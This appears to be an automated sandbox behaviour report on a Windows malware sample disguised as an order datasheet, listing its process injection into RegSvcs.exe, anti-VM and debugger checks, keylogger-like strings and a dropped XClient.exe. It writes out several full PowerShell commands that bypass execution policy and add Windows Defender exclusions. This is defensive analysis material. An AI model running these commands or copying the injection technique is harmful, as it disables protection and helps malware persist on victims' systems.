Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Code function: 0_2_00007FF7BD602B90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF7BD602B90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002AA6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: ORDERDATASHEET#PO8738763.scr.exe, ORDERDATASHEET#PO8738763.scr.exe.0.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: RegSvcs.exe, 00000003.00000002.1982834712.0000000007330000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
Source: RegSvcs.exe, 00000003.00000002.1942873699.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD5F8130 RtlAddVectoredExceptionHandler,RaiseFailFastException,		0_2_00007FF7BD5F8130
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Code function: 0_2_00007FF7BD65B70C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00007FF7BD65B70C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 73F008	Jump to behavior

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'regsvcs.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-^q
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q9<b>[ Program Manager]</b> (29/06/2024 04:04:30)<br>{Win}rTHcq
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q3<b>[ Program Manager]</b> (29/06/2024 04:04:30)<br>
Source: RegSvcs.exe, 00000003.00000002.1948750396.0000000002B76000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q8<b>[ Program Manager]</b> (29/06/2024 04:04:30)<br>{Win}THcq

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Code function: 0_2_00007FF7BD65BDA4 cpuid

0_2_00007FF7BD65BDA4

Source: C:\Users\user\Desktop\ORDERDATASHEET#PO8738763.scr.exe

Code function: GetLocaleInfoEx,

0_2_00007FF7BD6C0D30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
